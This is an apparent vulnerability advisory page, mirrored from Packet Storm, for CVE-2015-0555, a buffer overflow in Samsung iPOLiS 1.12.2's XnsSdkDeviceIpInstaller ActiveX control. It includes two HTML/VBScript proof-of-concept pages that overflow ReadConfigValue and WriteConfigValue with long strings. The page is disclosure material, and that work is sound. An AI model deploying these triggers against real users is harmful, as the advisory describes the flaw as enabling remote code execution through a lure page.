Samsung iPolis Buffer Overflow

🗓️ 21 Feb 2015 00:00:00Reported by Praveen DarshanamType

packetstorm🔗 packetstormsecurity.com👁 30 Views

Samsung iPolis Buffer Overflow Vulnerability - Remote Code Executio

Reporter	Title	Published	Views	Family All 24
0day.today	Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC	23 Feb 201500:00	–	zdt
CNVD	Samsung iPOLiS Device Manager Buffer Overflow Vulnerability	27 Feb 201500:00	–	cnvd
Check Point Advisories	Samsung iPOLiS Device Manager WriteConfigValue Stack Buffer Overflow (CVE-2015-0555)	29 Mar 201500:00	–	checkpoint_advisories
CVE	CVE-2014-3911	11 Jun 201414:00	–	cve
CVE	CVE-2015-0555	24 Feb 201515:00	–	cve
Cvelist	CVE-2014-3911	11 Jun 201414:00	–	cvelist
Cvelist	CVE-2015-0555	24 Feb 201515:00	–	cvelist
Exploit DB	Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)	22 Feb 201500:00	–	exploitdb
exploitpack	Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)	22 Feb 201500:00	–	exploitpack
NVD	CVE-2014-3911	11 Jun 201414:55	–	nvd

`CVE-2015-0555  
  
Introduction  
*************************************************************  
  
There is a Buffer Overflow Vulnerability which leads to Remote Code  
Execution.  
Vulnerability is due to input validation to the API ReadConfigValue and  
WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx  
  
This is different from CVE-2014-3911 as the version of iPolis 1.12.2  
(latest as of 12/12/2014).  
CVE-2014-3911 is related to different ActiveX and on older iPolis version  
  
Discovery MEthod: Fuzzing  
Exploiting: It is a client side attack where attacker can host a crafted  
HTML web page with malicious payload and entice the victim to browse to the  
hosted page to compromise the victim.  
  
Operating System: Windows 7 Ultimate N SP1  
  
*************************************************************  
Vulnerability1:  
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution*  
******************Proof of Concept (PoC)**************8  
</html>  
<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue()  
Remote Code Execution</head>  
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />  
<script language='vbscript'>  
  
targetFile = "C:\Program Files\Samsung\iPOLiS Device  
Manager\XnsSdkDeviceIpInstaller.ocx"  
prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String"  
memberName = "ReadConfigValue"  
progid = "XNSSDKDEVICELib.XnsSdkDevice"  
argCount = 1  
  
arg1=String(1044, "A")  
  
target.ReadConfigValue arg1  
  
</script>  
</html>  
  
  
*****************************************************************************************  
*Vulnerability2: *  
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution  
*  
  
*******************Proof of Concept (PoC)*********************  
  
<html>  
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />  
<script language='vbscript'>  
  
targetFile = "C:\Program Files\Samsung\iPOLiS Device  
Manager\XnsSdkDeviceIpInstaller.ocx"  
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal  
szValue As String ) As Long"  
memberName = "WriteConfigValue"  
progid = "XNSSDKDEVICELib.XnsSdkDevice"  
argCount = 2  
  
arg1=String(14356, "A")  
arg2="defaultV"  
  
target.WriteConfigValue arg1 ,arg2  
  
</script></job></package>  
</html>  
****************************************************************************  
  
CERT contacted Samsung but there wasn't any response from Samsung.  
Refer http://blog.disects.com for more details  
  
Best Regards,  
Praveen Darshanam  
  
  
`

21 Feb 2015 00:00Current

0.8Low risk

Vulners AI Score0.8

EPSS0.24857